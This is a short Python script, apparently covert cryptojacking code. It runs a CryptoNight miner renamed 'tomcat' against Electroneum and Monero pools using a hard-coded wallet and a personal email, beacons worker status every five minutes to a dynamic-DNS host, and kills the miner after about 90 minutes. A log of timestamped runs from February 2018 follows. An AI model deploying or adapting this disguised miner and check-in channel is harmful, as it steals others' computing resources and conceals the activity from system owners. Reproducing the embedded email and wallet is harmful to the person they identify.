import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:08:06.620794
#2018-02-17 16:54:01.632243
#2018-02-17 18:42:03.955732
#2018-02-17 20:32:04.986870
#2018-02-17 22:18:05.065590
#2018-02-18 00:02:04.397148
#2018-02-18 01:52:01.355669
#2018-02-18 03:39:06.100401
#2018-02-18 05:28:01.958055
#2018-02-18 07:20:01.767531
#2018-02-18 09:08:01.362204
#2018-02-18 10:54:01.322795
#2018-02-18 12:41:03.763116
#2018-02-18 14:28:01.341614
#2018-02-18 16:18:05.415607
#2018-02-18 18:07:06.270979
#2018-02-18 19:53:07.144773
#2018-02-18 21:41:01.656840
#2018-02-18 23:28:07.054187
#2018-02-19 01:15:03.227308
#2018-02-19 03:02:04.087793
#2018-02-19 04:47:06.670472
#2018-02-19 06:32:04.155574
#2018-02-19 08:21:07.924935
#2018-02-19 10:11:06.094565
#2018-02-19 11:59:07.561040
#2018-02-19 13:46:10.332085
#2018-02-19 15:36:05.929628
#2018-02-19 17:24:08.375743
#2018-02-19 19:12:06.016566
#2018-02-19 21:01:03.658617
#2018-02-19 22:48:01.580118
#2018-02-20 00:31:02.092457
#2018-02-20 02:19:05.094331
#2018-02-20 04:10:03.188144
#2018-02-20 05:53:03.815648
#2018-02-20 07:39:01.456823
#2018-02-20 09:24:05.543907
#2018-02-20 11:08:06.256553
#2018-02-20 12:56:10.691621
#2018-02-20 14:42:02.115080
#2018-02-20 16:26:10.732586
#2018-02-20 18:16:07.470459
#2018-02-20 20:07:01.376879
#2018-02-20 21:53:05.873445
#2018-02-20 23:36:05.417511
#2018-02-21 01:20:06.442607
#2018-02-21 03:08:03.657021
#2018-02-21 04:56:03.855493
#2018-02-21 06:46:05.602343
#2018-02-21 08:33:03.330744
#2018-02-21 10:18:05.677268
#2018-02-21 12:05:04.779970
#2018-02-21 13:54:04.970014
#2018-02-21 15:40:05.575303
#2018-02-21 17:33:01.932601
#2018-02-21 19:19:02.031353
#2018-02-21 21:09:05.494065
#2018-02-21 22:57:01.488159
#2018-02-22 00:43:03.691165
#2018-02-22 02:31:04.521762
#2018-02-22 04:17:01.719129
#2018-02-22 06:02:06.678693
#2018-02-22 07:47:05.761738
#2018-02-22 09:35:01.978297
#2018-02-22 11:20:06.226562
#2018-02-22 13:06:04.245487
#2018-02-22 14:53:04.000863
#2018-02-22 16:40:12.232654
#2018-02-22 18:26:04.152974
#2018-02-22 20:20:01.619570
#2018-02-22 22:07:08.873183
#2018-02-22 23:53:04.188592
#2018-02-23 01:40:03.325158
#2018-02-23 03:26:04.143813
#2018-02-23 05:13:08.173973
#2018-02-23 06:58:06.332021
#2018-02-23 08:47:06.799956
#2018-02-23 11:03:06.975734
#2018-02-23 12:57:01.689186
#2018-02-23 14:44:07.650984
#2018-02-23 16:32:04.334960
#2018-02-23 18:18:08.822411
#2018-02-23 20:03:03.494699
#2018-02-23 21:46:01.407990
#2018-02-23 23:39:04.876319
#2018-02-24 01:27:07.511495
#2018-02-24 03:17:07.333712
#2018-02-24 05:04:03.848575
#2018-02-24 06:54:05.408713
#2018-02-24 08:46:01.459812
#2018-02-24 10:46:04.933709
#2018-02-24 12:33:03.917327
#2018-02-24 14:21:06.540351
#2018-02-24 16:08:04.887017
#2018-02-24 17:59:01.649178
#2018-02-24 19:47:03.518988
#2018-02-24 21:33:04.325433
#2018-02-25 00:20:07.527957
#2018-02-25 04:03:01.903377
#2018-02-25 07:35:07.375519